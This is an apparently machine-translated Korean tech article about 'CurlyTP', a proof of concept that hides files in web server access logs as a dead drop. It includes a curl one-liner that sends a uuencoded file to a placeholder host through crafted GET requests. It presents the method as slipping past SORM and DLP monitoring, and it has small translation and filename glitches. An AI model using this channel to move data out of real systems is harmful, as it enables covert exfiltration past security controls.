위키피디아 정의에 따르면 데드 드롭은 비밀 장소를 사용하는 사람들 사이에 정보나 일부 항목을 교환하는 데 사용되는 음모 도구입니다. 사람들은 절대 만나지 않지만 운영 안전을 유지하기 위해 여전히 정보를 교환한다는 아이디어입니다.

은신처는 주의를 끌면 안 됩니다. 따라서 오프라인 세계에서는 벽에 붙은 헐거운 벽돌, 도서관 책, 나무 속 구멍 등 신중한 물건을 사용하는 경우가 많습니다.

인터넷에는 많은 암호화 및 익명화 도구가 있지만 이러한 도구를 사용한다는 사실 자체가 주목을 끌고 있습니다. 또한 기업이나 정부 차원에서 차단될 수도 있습니다. 무엇을 해야 할까요?

개발자 Ryan Flowers는 흥미로운 옵션을 제안했습니다. 웹 서버를 은신처로 사용. 생각해 보면 웹 서버는 어떤 일을 할까요? 요청을 받고, 파일을 발행하고, 로그를 작성합니다. 그리고 모든 요청을 기록합니다. 심지어 잘못된 것들도!

모든 웹 서버에서는 거의 모든 메시지를 로그에 저장할 수 있는 것으로 나타났습니다. 꽃들은 이것을 어떻게 사용하는지 궁금해했습니다.

그는 다음과 같은 옵션을 제공합니다.

1. 텍스트 파일(비밀 메시지)을 가져와서 해시(md5sum)를 계산합니다.
2. 인코딩합니다(gzip+uuencode).
3. 서버에 의도적으로 잘못된 요청을 사용하여 로그에 기록합니다.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

파일을 읽으려면 다음 작업을 역순으로 수행해야 합니다. 파일을 디코딩하고 압축을 풀고 해시를 확인합니다(해시는 공개 채널을 통해 안전하게 전송될 수 있음).

공백은 다음으로 대체됩니다. =+=주소에 공백이 없도록 합니다. 작성자가 CurlyTP라고 부르는 이 프로그램은 이메일 첨부 파일처럼 base64 인코딩을 사용합니다. 요청은 키워드로 이루어집니다. ?transfer?수신자가 로그에서 쉽게 찾을 수 있도록 합니다.

이 경우 로그에서 무엇을 볼 수 있나요?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

이미 언급했듯이 비밀 메시지를 받으려면 작업을 역순으로 수행해야 합니다.

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

이 프로세스는 자동화하기 쉽습니다. Md5sum이 일치하고 파일 내용을 통해 모든 것이 올바르게 디코딩되었음을 확인합니다.

방법은 매우 간단합니다. “이 연습의 요점은 단순한 웹 요청을 통해 파일이 전송될 수 있으며 일반 텍스트 로그가 있는 모든 웹 서버에서 작동한다는 것을 증명하는 것입니다. 본질적으로 모든 웹 서버는 은신처입니다!”라고 Flowers는 썼습니다.

물론 이 방법은 수신자가 서버 로그에 액세스할 수 있는 경우에만 작동합니다. 그러나 이러한 액세스는 예를 들어 많은 호스팅 업체에서 제공됩니다.

사용 방법?

Ryan Flowers는 자신이 정보 보안 전문가가 아니며 CurlyTP의 가능한 용도 목록을 작성하지 않을 것이라고 말했습니다. 그에게 이는 우리가 매일 보는 친숙한 도구가 색다른 방식으로 사용될 수 있다는 개념 증명일 뿐입니다.

실제로 이 방법은 다음과 같은 다른 서버 "숨기기"에 비해 여러 가지 장점이 있습니다. 디지털 데드 드롭 또는 해적상자: 서버 측의 특별한 구성이나 특별한 프로토콜이 필요하지 않으며 트래픽을 모니터링하는 사람들 사이에서 의심을 불러일으키지 않습니다. SORM 또는 DLP 시스템이 URL에서 압축된 텍스트 파일을 검색할 가능성은 거의 없습니다.

이는 서비스 파일을 통해 메시지를 전송하는 방법 중 하나입니다. 몇몇 선진 기업들이 어떻게 배치했는지 기억하실 겁니다. HTTP 헤더의 개발자 작업 또는 HTML 페이지의 코드에서.

일반 사람은 헤더나 HTML 코드를 보지 않기 때문에 웹 개발자만이 이 이스터 에그를 볼 수 있다는 생각이었습니다.

출처 : habr.com